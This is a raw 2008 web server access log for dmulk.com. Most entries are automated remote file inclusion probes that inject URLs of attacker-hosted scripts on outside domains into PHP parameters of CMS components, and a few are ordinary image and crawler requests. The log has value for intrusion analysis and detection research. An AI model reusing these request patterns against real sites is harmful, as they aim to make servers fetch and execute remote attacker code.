74.55.109.34 - - [28/Aug/2008:09:15:18 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:15:21 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:15:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:15:21 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [28/Aug/2008:09:15:21 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [28/Aug/2008:09:15:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.179.226 - - [28/Aug/2008:09:15:21 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:15:23 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:15:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:15:23 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:15:25 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:15:25 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:15:25 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:15:25 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:15:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [28/Aug/2008:09:15:26 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:15:38 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:15:38 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:15:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:15:39 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:15:39 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:15:39 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:15:45 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:15:45 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.14.46.18 - - [28/Aug/2008:09:15:45 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:16:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0006.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:16:39 -0700] "GET /logs/access_071211.log HTTP/1.0" 200 128565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:16:56 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:16:56 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:16:57 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:09:16:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:17:06 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:17:06 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.208.106 - - [28/Aug/2008:09:17:06 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:17:09 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:17:10 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.34.189 - - [28/Aug/2008:09:17:10 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:17:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-010.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:17:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-104.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:18:19 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:18:19 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:18:20 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:18:33 -0700] "GET /logs/access_080513.log/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:18:45 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
216.180.241.37 - - [28/Aug/2008:09:18:47 -0700] "GET /logs/access_080724.log/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:19:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:09:19:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://kriminologi.net/plugins/spamx/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:19:50 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0108.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
190.56.164.90 - - [28/Aug/2008:09:20:04 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [28/Aug/2008:09:20:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.18.216 - - [28/Aug/2008:09:20:05 -0700] "GET /logs/access_070709.log HTTP/1.0" 200 30963 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.56.164.90 - - [28/Aug/2008:09:20:06 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:20 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:22 -0700] "GET /logs/access_080731.log//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:22 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:22 -0700] "GET //include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:25 -0700] "GET /logs//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:25 -0700] "GET //include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:25 -0700] "GET /logs/access_080731.log//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:20:32 -0700] "GET /logs//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:39 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:40 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:42 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
190.56.164.90 - - [28/Aug/2008:09:20:46 -0700] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [28/Aug/2008:09:20:48 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [28/Aug/2008:09:20:50 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:20:52 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:20:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-047.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:21:08 -0700] "GET /logs/access_080806.log/?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.161.78 - - [28/Aug/2008:09:21:09 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://magickalforest.com//includes/v6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:21:10 -0700] "GET /?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 85231 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:09:21:11 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 200 62571 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:21:16 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-030_3.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:21:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-158_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:21:32 -0700] "GET /logs/access_080731.log//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:21:33 -0700] "GET //include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:21:33 -0700] "GET /logs//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.26.80.186 - - [28/Aug/2008:09:21:42 -0700] "GET /logs/modify.php?dir_module=http://deadrbt.free2hoxt.com/b0tz/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
189.26.80.186 - - [28/Aug/2008:09:21:42 -0700] "GET /modify.php?dir_module=http://deadrbt.free2hoxt.com/b0tz/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:44 -0700] "GET /logs/access_080312.log/page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:44 -0700] "GET /page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:45 -0700] "GET /logs/access_080329.log/page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:21:52 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-084_1.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:21:52 -0700] "GET /logs/access_080806.log/e404.php?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:21:53 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:09:21:53 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:58 -0700] "GET /logs/access_080312.log/page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:58 -0700] "GET /page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:58 -0700] "GET /logs/page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:21:59 -0700] "GET /logs/access_080329.log/page.php5?id=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:22:54 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:22:54 -0700] "GET //include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [28/Aug/2008:09:22:57 -0700] "GET /logs//include/write.php?dir=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:23:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
61.19.158.41 - - [28/Aug/2008:09:23:10 -0700] "GET /logs/access_080503.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:09:23:11 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:09:23:17 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-048_0.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:23:17 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:23:18 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.171.66.245 - - [28/Aug/2008:09:23:25 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:09:23:43 -0700] "GET /logs/access_080216.log//admin/frontpage_right.php?loadadminpage=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:09:23:43 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:09:23:43 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:09:23:51 -0700] "GET /logs/access_080216.log//admin/frontpage_right.php?loadadminpage=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:09:23:51 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.45.56.11 - - [28/Aug/2008:09:23:51 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.setteb.it/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:09:23:56 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
